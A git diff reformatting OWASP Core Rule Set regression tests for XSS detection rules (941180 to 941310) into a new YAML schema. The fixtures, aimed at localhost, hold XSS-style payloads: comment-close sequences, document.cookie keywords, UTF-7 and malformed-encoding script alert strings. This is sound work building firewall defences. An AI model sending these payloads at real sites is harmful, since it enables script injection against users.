- output: - log_contains: id "941180" - - test_title: 941180-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-4=-->' - version: "HTTP/1.1" - output: - no_log_contains: id "941180" - - test_title: 941180-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + version: "HTTP/1.1" + output: + no_log_contains: id "941180" + - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "941180" - - test_title: 941180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log_contains: id "941180" + - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'arg=...(document.domain)...' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + version: "HTTP/1.1" + output: + log_contains: id "941180" + - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/javascript-manual/document.cookie" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941180" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/javascript-manual/document.cookie" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: id "941180" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index a6f3217f3..5b2724d56 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -1,75 +1,70 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "941181.yaml" description: "Tests to trigger, or not trigger 941180" +rule_id: 941181 tests: - - test_title: 941181-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=-->' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + version: "HTTP/1.1" + output: + log_contains: id "941181" + - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=--%3E' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + version: "HTTP/1.1" + output: + log_contains: id "941181" + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '-->=941181-3' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + version: "HTTP/1.1" + output: + log_contains: id "941181" + - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '-->=941181-4' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941181" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941181" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 6b0f1e2fe..f81fc28d0 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -1,92 +1,86 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "941190.yaml" description: "Tests to trigger, or not trigger 941190" +rule_id: 941190 tests: - - test_title: 941190-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "941190-1=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "941190-1=" + version: "HTTP/1.1" + output: + log_contains: id "941190" + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "x=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "x=" + version: "HTTP/1.1" + output: + log_contains: id "941190" + - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: id "941190" + - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - test_title: 941230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941230" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941230" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index b77c0de58..2967f2214 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -2,38 +2,34 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941240.yaml tests: - - test_title: 941240-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" - - test_title: 941240-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941240" + - test_id: 2 desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941250" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index d7e14f52c..de2b0b855 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -2,40 +2,36 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941260.yaml tests: - - test_title: 941260-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - test_title: 941260-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941260" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log_contains: id "941260" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 26a2d797b..87ea07326 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml @@ -2,39 +2,35 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941270.yaml tests: - - test_title: 941270-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - test_title: 941270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log_contains: id "941270" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: 'payload=' + output: + log_contains: id "941270" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index e34641c10..7753e0936 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml @@ -2,42 +2,38 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941280.yaml tests: - - test_title: 941280-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - test_title: 941280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log_contains: id "941280" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - test_title: 941290-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log_contains: id "941290" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log_contains: id "941290" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 43909b15a..4952f90dc 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml @@ -2,39 +2,35 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941300.yaml tests: - - test_title: 941300-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - test_title: 941300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log_contains: id "941300" + - test_id: 2 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941300" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 453fac17d..7d7e98d5b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml @@ -2,226 +2,213 @@ meta: author: "Christian S.J. Peron, Federico G. Schwindt, azurit" description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml +rule_id: 941310 tests: - - test_title: 941310-1 + - test_id: 1 desc: Positive test using single byte stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" + - test_id: 2 desc: Positive test using utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" + - test_id: 3 desc: Positive test using alternate utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" + - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" - data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 6 desc: Negative test for opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: 